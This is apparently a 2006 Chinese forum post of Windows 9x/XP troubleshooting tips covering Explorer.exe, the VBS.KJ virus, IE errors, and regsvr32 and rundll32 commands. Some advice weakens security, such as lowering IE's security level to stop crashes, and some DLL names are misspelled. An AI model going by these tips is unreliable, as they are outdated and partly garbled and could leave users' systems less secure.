凡是Windows系列的操作系统,运行时都会启动一个名为Explorer.exe的进程。这个进程主要负责显示系统桌面上的图标以及任务栏,它在不同的系统中有不同的妙用。

  Windows 9x中的应用

  在Windows 9x中,这个进程是运行系统时所必需的。如果用“结束任务”的方法来结束Explorer.exe进程,系统就会刷新桌面,并更新注册表。所以,我们也可以利用此方法来快速更新注册表。方法如下:

  按下Ctrl+Alt+Del组合键,出现“结束任务”对话框。在该对话框中选择“Explorer”选项,然后单击“结束任务”按钮,将出现“关闭Windows”对话框。单击“否”按钮,系统过一会儿将出现另一个对话框,告诉你该程序没有响应,询问是否结束任务。单击“结束任务”按钮,则更新注册表并返回Windows 9x系统环境中。这比起烦琐的重新启动过程要方便多了?

  Windows 2000/XP中的应用

在Windows 2000/XP和其他Windows NT内核的系统中,Explorer.exe进程并不是系统运行时所必需的,所以可以用任务管理器来结束它,并不影响系统的正常工作。打开你需要运行的程序,如记事本。然后右击任务栏,选择“任务管理器”,选中“进程”选项卡,在窗口中选择Explorer.exe进程,单击“结束进程”按钮,,接下来桌面上除了壁纸(活动桌面Active Desktop的壁纸除外),所有图标和任务栏都消失了。此时你仍可以像平常一样操作一切软件。

如果你想运行其他软件,但此时桌面上空无一物,怎么办?别着急,下面有两种可以巧妙地打开其他软件:

  第一种方法:按下Ctrl+Alt+Del组合键,出现“Windows安全”对话框,单击“任务管理器”按钮(或是直接按下Ctrl+Shift+Esc组合键),在任务管理器窗口中选中“应用程序”选项卡,单击“新任务”,在弹出的“创建新任务”的对话框中,输入你想要打开的软件的路径和名称即可。

  你还可以在正在运行的软件上,选择“文件→打开”,在“打开”对话框中,点击“文件类型”下拉列表,选择“所有文件”,再浏览到你想打开的软件,右击它,在快捷菜单中选择“打开”命令,就可以启动你需要的软件了。注意,此时不能够通过单击“打开”按钮来打开软件,此种方法适用于大多数软件,Office系列除外。
通过结束Explorer.exe进程,还可以减少4520KB左右的系统已使用内存,无疑会加快系统的运行速度,为资源紧张的用户腾出了宝贵的空间。

  提示:重新启动Explorer.exe进程后,有些软件在任务栏系统托盘的小图标会消息,但该软件还是在正常运行当中。如果觉得有些不方便,可以再次打开该软件来显示小图标。


十六、folder.htt等文件的问题

Q12.2:最近在我的电脑的所有文件夹中出现了这样两个文件esktop.ini、folder.htt,怎么也删不去。有人说是病毒,把系统和别的分区全格式化了就好了。可是我的东西全都有用,不能格式化的,请问怎么办?

  A:你的电脑可能是感染了VBS.KJ脚本病毒。该病毒采用VBScript语言编写,在互联网上通过电子邮件进行传播,也可以通过文件感染;感染后的机器系统资源被大量消耗,速度变慢;利用Windows系统的“资源管理器”进行寄生与感染。在每个检查到的文件夹下生成desktop.ini和folder.htt文件(隐藏属性)。并且,该病毒还会修改注册表的许多键值。手工删除比较困难,建议采用杀毒软件杀毒,这样可以避免格式化你的硬盘,保护你的数据。金山公司反病毒应急处理中心的《新欢乐时光》专杀工具效果比较好,并提供免费下载,下载链接ftp://www.iduba.net/download/othertools/scanvbskj.exe大小仅56KB!

十七、found.000文件夹的问题

问:我的电脑有的时候在C盘或D盘的根目录下有个名为found.000的文件夹,里面有一些后缀名为CHK的文件。在c:\windows下有很多以fff开头的怪文件,而且大小全部为0字节。请问这些是什么文件?能否将它们删除?

  答:found.000文件夹里面的一些后缀名为CHK的文件是你在使用“磁盘碎片整理程序”整理硬盘后所产生的“丢失簇的恢复文件”。在c:\windows下有很多以fff开头的文件是由Mdm.exe(Machine Debug Manager)这个程序产生的。Mdm.exe的主要工作是针对应用软件进行排错(Debug),在排错过程中会产生一些暂存文件,这些文件在操作系统进行关机时没有自动被清除,所以这些fff开头的怪文件和found.000文件夹里面的一些后缀名为CHK的文件都是没有用的垃圾文件,可以任意删除而不会对系统产生不良影响。

  但只要系统中有Mdm.exe存在,那么以fff开头的怪文件就又有可能产生。你可以按下面的方法让系统停止运行Mdm.exe来彻底删除以fff开头的怪文件:首先按“Ctrl+Alt+Del”组合键,在弹出的“关闭程序”窗口中选中“Mdm”,按“结束任务”按钮来停止Mdm.exe在后台的运行,接着把Mdm.exe(在C:\Windows\System目录下)改名为Mdm.bak。运行msconfig程序,在启动页中取消对“Machine Debug Manager”的选择。这样可以不让Mdm.exe自启动,然后点击“确定”按钮,结束msconfig程序,并重新启动电脑。另外,如果你使用IE 5.X,建议禁用脚本调用(点击“工具→Internet选项→高级→禁用脚本调用”),这样就可以避免以fff开头的怪文件再次产生。

十八、IE浏览器八大经典故障写真集

当你驾着心爱的IE在Internet上纵横驰骋时,突然桌面上弹出一个莫名其妙的警告提示框,紧接着所有IE窗口全部关闭;或无论如何点击链接,IE始终没有反应……这些故障让人心烦意乱,无可奈何。不过你也不用手足无措,今天我们就一起将IE常见错误揪出来,并彻底消灭!

1.发送错误报告
【故障现象】
在使用IE浏览网页的过程中,出现“Microsoft Internet Explorer遇到问题需要关闭……”
的信息提示。此时,如果单击“发送错误报告”按钮,则会创建错误报告,单击“关闭”按钮之后
会引起当前IE窗口关闭;如果单击“不发送”按钮,则会关闭所有IE窗口。
【故障点评】
这是IE为了解用户在使用中的错误而设计的一个小程序,不过我可不想当微软的“免费测试员”,
更何况每天它都会面对成千上万的报告,谁知道有没有在意我的报告问题呢?
【故障解决】
针对不同情况,可分别用以下方法关闭IE发送错误报告功能:
①对IE 5.x用户,执行“控制面板→添加或删除程序”,在列表中选择
“Internet Explorer Error Reporting”选项,然后单击“更改/删除”按钮,将其从系统中删除。
②对Windows 9x/Me/NT/2000下的IE 6.0用户,则可打开“注册表编辑器”,
找[HKEY_LOCAL_MACHINE\Software \Microsoft\Internet Explorer\Main],在右侧窗格
创建名为IEWatsonEnabled的DWORD双字节值,并将其赋值为0。
③对Windows XP的IE 6.0用户,执行“控制面板→系统”,切换到“高级”选项卡,单击“错误报告”
按钮,选中“禁用错误报告”选项,并选中“但在发生严重错误时通知我”,最后单击“确定”按钮。


2.IE发生内部错误,窗口被关闭
【故障现象】
在使用IE浏览一些网页时,出现错误提示对话框:“该程序执行了非法操作,即将关闭……”,
单击“确定”按钮后又弹出一个对话框,提示“发生内部错误……”。单击“确定”按钮后,
所有打开的IE窗口都被关闭。
【故障点评】
该错误产生原因多种多样,内存资源占用过多、IE安全级别设置与浏览的网站不匹配、与其他软件
发生冲突、浏览网站本身含有错误代码……这些情况都有可能,需要耐心加以解决。
【故障解决】
①关闭过多的IE窗口。如果在运行需占大量内存的程序,建议IE窗口打开数不要超过5个。
②降低IE安全级别。执行“工具→Internet选项”菜单,选择“安全”选项卡,单击“默认级别”
按钮,拖动滑块降低默认的安全级别。
③将IE升级到最新版本。IE 6.0下载地址:IE6.0 。IE 6.0 SP1下载地址: windows Update 。
可使用以IE为核心的浏览器,如MyIE2。它占用系统资源相对要少,而且当浏览器发生故障关闭时,
下次启动它,会有“是否打开上次发生错误时的页面”的提示,尽可能地帮你挽回损失.


3.出现运行错误
【故障现象】
用IE浏览网页时弹出“出现运行错误,是否纠正错误”对话框,单击“否”按钮后,
可以继续上网浏览。
【故障点评】
可能是所浏览网站本身的问题,也可能是由于IE对某些脚本不支持。
【故障解决】
①启动IE,执行“工具→Internet选项”菜单,选择“高级”选项卡,选中“禁止脚本调试”复选框,
最后单击“确定”按钮即可。
②将IE浏览器升级到最新版本。


4.IE窗口始终最小化的问题
【故障现象】
每次打开的新窗口都是最小化窗口,即便单击“最大化”按钮后,下次启动IE后新窗口仍旧是最小化的。
【故障点评】
IE具有“自动记忆功能”,它能保存上一次关闭窗口后的状态参数,IE本身没有提供相关设置选项,
不过可以借助修改注册表来实现。
【故障解决】
①打开“注册表编辑器”,
找到[HKEY_ CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old WorkAreas],
然后选中窗口右侧的“OldWorkAreaRects”,将其删除。
②同样在“注册表编辑器”
中找到[HKEY_CURRENT_USER\Software \Microsoft\Internet Explorer\Main],
选择窗口右侧的“Window_Placement”,将其删除。
③退出“注册表编辑器”,重启电脑,然后打开IE,将其窗口最大化,并单击“往下还原”按钮将
窗口还原,接着再次单击“最大化”按钮,最后关闭IE窗口。以后重新打开IE时,窗口就正常了!


5.IE无法打开新窗口
【故障现象】   
在浏览网页过程中,单击超级链接无任何反应。
【故障点评】
多半是因为IE新建窗口模块被破坏所致。
【故障解决】
单击“开始→运行”,依次运行“regsvr32 actxprxy.dll”和“regsvr32 shdocvw.dll”
将这两个DLL文件注册,然后重启系统。如果还不行,则可以将
mshtml.dll、urlmon.dll、msjava.dll、browseui.dll、oleaut32.dll、shell32.dll也注册一下。


6.脱机却无法浏览本机上的网页
【故障现象】
通过IE的“脱机浏览”功能,我们差不多能浏览所有已经下载到本地硬盘的网页内容,这对拨号上网
的用户来说更是省钱的一大法宝。但有时,目标网页虽然在硬盘上,但是却提示“无法浏览”。
【故障点评】
这多半是由于你修改了系统时间,引起了IE历史记录的错乱。
【故障解决】
①可用直接在“临时文件夹”中搜索的方法来激活它。按下Win+F,在“包含文字”处输入部分记忆中
的关键字,在“搜索”处按“浏览”按钮选择IE临时文件夹的地址,
如“C:\WINDOWS\Temporary Internet Files”,单击“开始查找”,在结果列表里双击目标页打开。
②可以尝试用腾讯的TE等浏览器来脱机浏览。


7.联网状态下,浏览器无法打开某些站点
【故障现象】
上网后,在浏览某些站点时遇到各种不同的连接错误。
【故障点评】
这种错误一般是由于网站发生故障或者你没有浏览权限所引起。
【故障解决】
针对不同的连接错误,IE会给出不同的错误信息提示,比较常见的有以下几个:
①提示信息:404 NOT FOUND这是最为常见的IE错误信息。主要是因为IE不能找到你所要求的网页文件,
该文件可能根本不存在或者已经被转移到了其他地方。
②提示信息:403 FORBIDDEN常见于需要注册的网站。一般情况下,可以通过在网上即时注册来解决该
问题,但有一些完全“封闭”的网站还是不能访问的。
③提示信息:500 SERVER ERROR通常由于所访问的网页程序设计错误或者数据库错误而引起,你只有
等待对方网页纠正错误后再浏览了。


8.IE无法重新安装
【故障现象】
IE不能正常使用,在重装时却提示“发现系统中有该版本的IE”而拒绝安装;“添加或删除程序”
中又没有卸载选项。
【故障点评】
“重装”是解决IE故障的“终极大法”,也是初级用户的法宝。
【故障解决】
①对IE 5.0的重装可按以下步骤进行:
第一步:打开“注册表编辑器”,
找到[HKEY_LOCAL_ MACHINE\Software\Microsoft\Internet Explorer],
单击其下的Version Vector键。
第二步:在右侧窗格中双击IE子键,将原来的“5.0002”改为“4.0”,单击“确定”后退出
“注册表编辑器”。
第三步:重启后,就可以重装IE 5.0了。
②IE 6.0的重装有两种方法:
方法1:打开“注册表编辑器”,找到
[HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Active Setup
\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}],
将IsInstalled的DWORD值改为0就可以了。
方法2:放入Windows XP安装盘,在“开始→运行”
窗口键入“rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%\Inf\ie.inf”。

十九、让IE以最大化显示

  问:我使用的操作系统是Windows 2000,上网一段时间后,突然发觉IE无法以最大化显示,把IE重装一遍后,也无法解决这个问题,请问我该怎么办?

  答:在“运行”中输入regedit打开注册表编辑器,选择“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\”,在右边的窗口中删除“Window_Placement”键,在 “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old Work-Areas”右边窗口中删除“OldWorkAreaRects”键。关闭注册表编辑器,重新启动计算机,连续两次最大化IE窗口(即“最大化→还原→最大化”),再次重新启动IE就可以了。

二十、Mfm1992文件问题

  问:我的桌面上出现了一个名为Mfm1992的视窗图案的图标,路径是C:\Windows\Desktop,占用45056字节,请问它是什么文件?

  答:“Mfm1992”是中文输入法“智能ABC”的记录文件。你的电脑中出现“Mfm1992”文件是由于你使用了“智能ABC”输入法作为中文录入的方式,这也应该算是“智能ABC”输入法的一个Bug,该文件可以随时删除而不会影响系统,不必担心。
 
从心选者,用心交流.
级别: 光盘中级
发帖
1140
飞翔币
335
威望
303
飞扬币
8460
信誉值
0
只看该作者 1 发表于: 2006-12-28
[size=12px]二十一、Regsvr32 用法和错误消息的说明

对于那些可以自行注册的对象链接和嵌入 (OLE) 控件,例如动态链接库 (DLL) 文件或 ActiveX 控件 (OCX) 文件,您可以使用 Regsvr32 工具 (Regsvr32.exe) 来将它们注册和取消注册。

Regsvr32.exe 的用法

RegSvr32.exe 具有以下命令行选项: Regsvr32 [/n] [/i[:cmdline]] dllname

/u - Unregister server

/i - Call DllInstall passing it an optional [cmdline];
when used with /u calls dll uninstall
/n - do not call DllRegisterServer; this option must
be used with /i

当您使用 Regsvr32.exe 时,它会尝试加载该组件并调用它的 DLLSelfRegister 函数。如果此尝试成功,Regsvr32.exe 会显示一个指示成功的对话框。如果此尝试失败,Regsvr32.exe 会返回一条错误消息,其中可能会包括一个 Win32 错误代码。要查看 Win32 错误代码的列表,请参见下面的 Microsoft Web 站点:
http://msdn.microsoft.com/librar ... n32_error_codes.asp

例如,要手动注册 Sample.ocx ActiveX 控件,请在 MS-DOS 提示符处键入以下命令:
c:\regsvr32.exe sample.ocx

Regsvr32.exe 错误消息

以下列表介绍了 RegSvr32 错误消息和可能的原因。

Unrecognized flag:/invalid_flag

键入的标志或开关组合无效(请参阅本文中的“Regsvr32.exe 的用法”一节)。

No DLL name specified.

未包括 .dll 文件名(请参阅本文中的“Regsvr32.exe 的用法”一节)。

Dllname was loaded, but the DllRegisterServer or DllUnregisterServer entry point was not found.

Dllname 不是 .dll 或 .ocx 文件。例如,键入 regsvr32 wjview.exe 就会生成该错误消息。

Dllname is not an executable file and no registration helper is registered for this file type.

Dllname 不是可执行文件(.exe、.dll 或 .ocx)。例如,键入 regsvr32 autoexec.bat 就会生成该错误消息。

Dllname was loaded, but the DllRegisterServer or DllUnregisterServer entry point was not found.

Dllname 可能未导出,或者内存中可能有损坏的 Dllname 版本。请考虑使用 Pview 来检测该文件并删除它。

Dllname is not self-registerable or a corrupted version is in memory.

例如,键入 regsvr32 icwdial.dll 后就会返回该错误消息,因为 Icwdial.dll 文件不能自行注册。如果您怀疑内存中有损坏的 Dllname 版本,请尝试重新启动计算机,或重新提取该文件的原始版本。如果您运行的是 Windows NT,可能需要使用 Microsoft Windows NT Server 4.0 资源工具包 中的 Kill 或 Pview 工具。有关其他信息,请单击以查看以下 Microsoft 知识库文章:
197155 如何终止孤立进程

OleInitialize failed (or OleUninitialize failed).

Regsvr32 必须先初始化 COM 库,然后才能调用所需的 COM 库函数并在关闭时撤消对该库的初始化。如果对 COM 库进行初始化或撤消初始化的尝试失败,就会出现这些错误消息。例如,Ole32.dll 文件可能已经损坏,或者其版本有误。

LoadLibrary("Dllname") failed.GetlastError returns 0x00000485

在 Winerror.h 中,0x00000485 = 1157 (ERROR_DLL_NOT_FOUND),表示“找不到运行该应用程序所需的某个库文件”。例如,键入 regsvr32 missing.dll 后,如果找不到 Missing.dll 文件,就会返回该错误消息。

LoadLibrary("Dllname") failed.GetLastError returns 0x00000002

在 Winerror.h 中,0x00000002 = 2 (ERROR_FILE_NOT_FOUND),表示“系统找不到指定的文件”。换言之,系统找不到相关的 DLL。例如,如果键入 regsvr32 icwdial.dll,而此时缺少 Tapi32.dll(依赖项),就会返回该错误消息。

LoadLibrary("dskmaint.dll") failed.GetLastError returns 0x000001f

在 Winerror.h 中,0x000001f = 31 (ERROR_GEN_FAILURE),表示“附加到系统上的设备不能正常工作”。如果您尝试注册 Win16 .dll 文件,就会发生此现象。例如,键入 regsvr32 dskmaint.dll 会返回该错误消息。

DllRegisterServer (or DllUnregisterServer)in Dllname failed.返回代码是:字符串

在 Winerror.h 中搜索字符串。
Regsvr32.exe 和依赖项
RegSvr32.exe 依赖于 Kernel32.dll、User32.dll 和 Ole32.dll 文件(在 Windows NT 中,还依赖于 Msvcrt.dll 和 Advapi32.dll 文件)。Regsvr32.exe 会加载您尝试注册或撤消注册的文件及其所有依赖项。如果缺少必需的文件或者它们已损坏,该进程可能会失败。

您可以使用 Depends.exe 来确定您尝试注册或撤消注册的文件的依赖项。在 Microsoft Windows 98 资源工具包 和 Microsoft Windows NT 4.0 资源工具包 支持工具中都提供了 Depends.exe。
247024 Tools Included with the Microsoft Windows 98 Resource Kit

二十二、Regsvr32使用方法

  使用过activex的人都知道,activex不注册是不能够被系统识别和使用的,一般安装程序都会自动地把它所使用的activex控件注册,但如果你拿到的一个控件需要手动注册怎么办呢?如果修改注册表那就太麻烦了,在windows的system文件夹下有一个regsvr32.exe的程序,它就是windows自带的activex注册和反注册工具。它的用法为:

  “regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为activex控件文件名,建议在安装前拷贝到system文件夹下。

  参数有如下意义:

  /u——反注册控件

  /s——不管注册成功与否,均不显示提示框

  /c——控制台输出

  /i——跳过控件的选项进行安装(与注册不同)

  /n——不注册控件,此选项必须与/i选项一起使用


二十三、Regsvr32命令修复系统故障

Regsvr32命令是 Windows 系统提供的一个实用工具,它用来向系统注册控件或者卸载控件,利用该命令,可找回系统丢失的功能。Regsvr32命令以命令行方式运行,其命令格式为: Regsvr32 Filename, Filename是控件文件名,不带参数 u 就是注册控件,带参数 u 就是卸载控件。
l. 恢复图片预览功能: Windows XP的图片预览功能,对应的控件文件为 thurnbvw.dll。 如果该功能损坏,可单击“开始”一“运行” , 在“打开”框中输人:" Regsvr32 Thurnbvw. dll" ,单击“确定”执行命令,这时就会弹出提示框: " DllRegisterServer in Thumbvw.dll succeeded." ,这表明控件注册成功。重新启动电脑,WindowsXP 的图片预览功能便恢复了。
  2. 恢复ZIP功能:Windows XP 系统提供了ZIP功能,虽然功能不算强大,但不需要第三方软件就可打开ZIP文件,而且可以把ZIP压缩文件当作文件夹使用,也算是比较方便、实用的功能。如果该功能损坏,可在运行框中执行“Regsvr32 ZIPfldr.dll”命令,然后重新启动电脑即可恢复。
3. 恢复IE新窗口打开超级链接功能:在IE中有两种超级链接,一种是在当前页面跳转的链接,另一种是弹出新窗口的链接,对第一种链接也可按住Shift键在新窗口中打开。很多人都遇到过不能在新窗口打开链接的麻烦事儿,这个问题也是因控件注册信息丢失引起的。解决办法是:在运行框中分别执行三个命令:“Regsvr32 Actxprxy.dll ”、“Regsvr32 Shdocvw.dll”、 " Regsvr32 Oleaut32.dll ”。一这三个控件注册成功后,重新启动电脑, IE 就恢复正常了。
  4. 恢复FSO功能:现在有很多人利用自己的电脑建论坛、网站,论坛或者动态网站程序都可进行在线文件管理,管理员通过页面就可操作文件,但经常有人反映自己的论坛、网站不能在线管理文件,这是因为服务器的FSO功能没有开通或者出现故障,解决办法是:在服务器的运行框中执行“Regsvr32 Sorrun.dll " ,最后重启服务器即可开通/恢复FSO功能。
  5. 恢复在线升级功能:在Windows的“开始”菜单的顶端,有一个“Windows Update”项,可以快捷的对系统进行在线升级打补。但有时会发现无法进行在线升级,要解决这个故障,只要在运行框中执行 " Regsvr32 Wupdinfo.dll " ,重启电脑即可解决。

二十四、RUNDLL32.EXE 是什么程序

Rundll32.exe是什么?顾名思意,“执行32位的DLL文件”。它的作用是执行DLL文件中的内部函数,这样在进程当中,只会有Rundll32.exe,而不会有DLL后门的进程,这样,就实现了进程上的隐藏。如果看到系统中有多个Rundll32.exe,不必惊慌,这证明用Rundll32.exe启动了多少个的DLL文件。当然,这些Rundll32.exe执行的DLL文件是什么,我们都可以从系统自动加载的地方找到。

现在,我来介绍一下Rundll32.exe这个文件,意思上边已经说过,功能就是以命令行的方式调用动态链接程序库。系统中还有一个Rundll.exe文件,他的意思是“执行16位的DLL文件”,这里要注意一下。在来看看Rundll32.exe使用的函数原型:
Void CALLBACK FunctionName (
HWND hwnd,
HINSTANCE hinst,
LPTSTR lpCmdLine,
Int nCmdShow
);

其命令行下的使用方法为:Rundll32.exe DLLname,Functionname [Arguments]
DLLname为需要执行的DLL文件名;Functionname为前边需要执行的DLL文件的具体引出函数;[Arguments]为引出函数的具体参数。
略谈Rundll32.exe的作用 (我是菜鸟)



常用Windows9x的朋友一定对Rundll32.exe和Rundll.exe这两个档案不会陌生吧,不过,由於这两个程式的功能原先只限於在微软内部使用,因而真正知道如何使用它们的朋友想必不多。那么好,如果你还不清楚的话,那么就让我来告诉你吧。
首先,请你做个小实验(请事先保存好你正在执行的程式的结果,否则...):点击“开始-程式-Ms-Dos方式”,进入Dos视窗,然後键入rundll32.exe user.exe,restartwindows,再按下回车键,这时你将看到,机器被重启了!怎么样,是不是很有趣?
当然,Rundll的功能绝不仅仅是重启你的机器。其实,Rundll者,顾名思义,执行Dll也,它的功能就是以命令列的方式呼叫Windows的动态链结库,Rundll32.exe与Rundll.exe的区别就在於前者是呼叫32位的链结库,而後者是运用於16位的链结库,它们的命令格式是:

RUNDLL.EXE ,,
这里要注意三点:1.Dll档案名中不能含有空格,比如该档案位於c:\ProgramFiles\目录,你要把这个路径改成c:\Progra~1\;2.Dll档案名与Dll入口点间的逗号不能少,否则程式将出错并且不会给出任何资讯!3.这是最重要的一点:Rundll不能用来呼叫含返回值参数的Dll,例如Win32API中的GetUserName(),GetTextFace()等。在Visual Basic中,提供了一条执行外部程式的指令Shell,格式为:
Shell “命令列”
如果能配合Rundll32.exe用好Shell指令,会使您的VB程式拥有用其他方法难以甚至无法实现的效果:仍以重启为例,传统的方法需要你在VB工程中先建立一个模组,然後写入WinAPI的声明,最後才能在程式中呼叫。而现在只需一句:

Shell “rundll32.exe user.exe,restartwindows”就搞定了!是不是方便多了?
实际上,Rundll32.exe在呼叫各种Windows控制面板和系统选项方面有著独特的优势。下面,我就将本人在因特网上收集的有关Rundll的指令列举如下(很有用的,能省去你很多呼叫Windows API的时间!!),供大家在程式设计中引用:
命令列: rundll32.exe shell32.dll,Control_RunDLL
功能: 显示控制面板
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1
功能: 显示“控制面板-辅助选项-键盘”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2
功能: 显示“控制面板-辅助选项-声音”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3
功能: 显示“控制面板-辅助选项-显示”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4
功能: 显示“控制面板-辅助选项-滑鼠”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5
功能: 显示“控制面板-辅助选项-传统”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1
功能: 执行“控制面板-添加新硬体”向导。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter
功能: 执行“控制面板-添加新印表机”向导。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1
功能: 显示 “控制面板-添加/删除程式-安装/卸载” 面板。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2
功能: 显示 “控制面板-添加/删除程式-安装Windows” 面板。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3
功能: 显示 “控制面板-添加/删除程式-启动盘” 面板。
命令列: rundll32.exe syncui.dll,Briefcase_Create
功能: 在桌面上建立一个新的“我的公文包”。
命令列: rundll32.exe diskcopy.dll,DiskCopyRunDll
功能: 显示复制软碟视窗
命令列: rundll32.exe apwiz.cpl,NewLinkHere %1
功能: 显示“建立快捷方式”的对话框,所建立的快捷方式的位置由%1参数决定。
命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,0
功能: 显示“日期与时间”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1
功能: 显示“时区”选项视窗。
命令列: rundll32.exe rnaui.dll,RnaDial [某个拨号连接的名称]
功能: 显示某个拨号连接的拨号视窗。如果已经拨号连接,则显示目前的连接状态的视窗。
命令列: rundll32.exe rnaui.dll,RnaWizard
功能: 显示“新建拨号连接”向导的视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0
功能: 显示“显示属性-背景”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1
功能: 显示“显示属性-萤屏保护”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2
功能: 显示“显示属性-外观”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3
功能: 显示显示“显示属性-属性”选项视窗。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder
功能: 显示Windows的“字体”档案夹。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
功能: 同样是显示Windows的“字体”档案夹。
命令列: rundll32.exe shell32.dll,SHformatDrive
功能: 显示格式化软碟对话框。
命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,0
功能: 显示“控制面板-游戏控制器-一般”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL joy.cpl,,1
功能: 显示“控制面板-游戏控制器-进阶”选项视窗。
命令列: rundll32.exe mshtml.dll,PrintHTML (HTML文档)
功能: 列印HTML文档。
命令列: rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl
功能: 显示Microsoft Exchange一般选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @0
功能: 显示“控制面板-滑鼠” 选项 。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1
功能: 显示 “控制面板-键盘属性-速度”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @1,,1
功能: 显示 “控制面板-键盘属性-语言”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @2
功能: 显示Windows“印表机”档案夹。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
功能: 显示Windows“字体”档案夹。
命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @4
功能: 显示“控制面板-输入法属性-输入法”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL modem.cpl,,add
功能: 执行“添加新调制解调器”向导。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0
功能: 显示“控制面板-多媒体属性-音频”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1
功能: 显示“控制面板-多媒体属性-视频”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2
功能: 显示“控制面板-多媒体属性-MIDI”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3
功能: 显示“控制面板-多媒体属性-CD音乐”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4
功能: 显示“控制面板-多媒体属性-设备”属性页。
命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1
功能: 显示“控制面板-声音”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl
功能: 显示“控制面板-网路”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl
功能: 显示ODBC32资料管理选项视窗。
命令列: rundll32.exe shell32.dll,OpenAs_RunDLL {drive:\path\filename}

功能: 显示指定档案(drive:\path\filename)的“打开方式”对话框。
命令列: rundll32.exe shell32.dll,Control_RunDLL password.cpl
功能: 显示“控制面板-密码”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl
功能: 显示“控制面板-电源管理属性”选项视窗。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder
功能: 显示Windows“印表机”档案夹。(同rundll32.exe shell32.dll,Control_RunDLL main.cpl @2)
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0
功能: 显示“控制面板-区域设置属性-区域设置”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1
功能: 显示“控制面板-区域设置属性-数字”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2
功能: 显示“控制面板-区域设置属性-货币”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3
功能: 显示“控制面板-区域设置属性-时间”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4
功能: 显示“控制面板-区域设置属性-日期”选项视窗。
命令列: rundll32.exe desk.cpl,InstallScreenSaver [萤屏保护档案名]
功能: 将指定的萤屏保护档案设置为Windows的屏保,并显示萤屏保护属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0
功能: 显示“控制面板-系统属性-传统”属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
功能: 显示“控制面板-系统属性-设备管理器”属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
功能: 显示“控制面板-系统属性-硬体配置档案”属性视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
功能: 显示“控制面板-系统属性-性能”属性视窗。
命令列: rundll32.exe user.exe,restartwindows
功能: 强行关闭所有程式并重启机器。
命令列: rundll32.exe user.exe,exitwindows
功能: 强行关闭所有程式并关机。
命令列: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl
功能: 显示“拨号属性”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL themes.cpl
功能: 显示“桌面主旨”选项面板
当然,不止是VisualBasic,象Delphi.VisualC++等其他程式设计语言也可以通过呼叫外部命令的方法来使用Rundll的这些功能,具体方法这里就不再详细叙述了。灵活的使用Rundll,一定会使你的程式设计轻轻松松,达到事半功倍的效果!

二十五、SFC使用方法

